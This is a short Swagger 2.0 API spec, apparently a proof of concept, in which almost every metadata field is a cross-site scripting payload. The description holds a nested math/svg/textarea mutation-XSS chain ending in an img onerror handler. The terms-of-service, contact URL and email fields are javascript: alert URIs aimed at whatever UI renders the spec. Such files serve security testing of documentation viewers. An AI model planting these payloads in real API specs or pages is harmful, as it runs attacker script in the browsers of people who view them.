swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=alert(document.domain)'></textarea></h1>></textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
  termsOfService: 'javascript:alert(document.domain)'
basePath: /Test/
contact:
  name: 'URL Support'
  url: 'javascript:alert(document.domain)'
  email: 'javascript:alert(document.domain)'
version: '1.0.1'
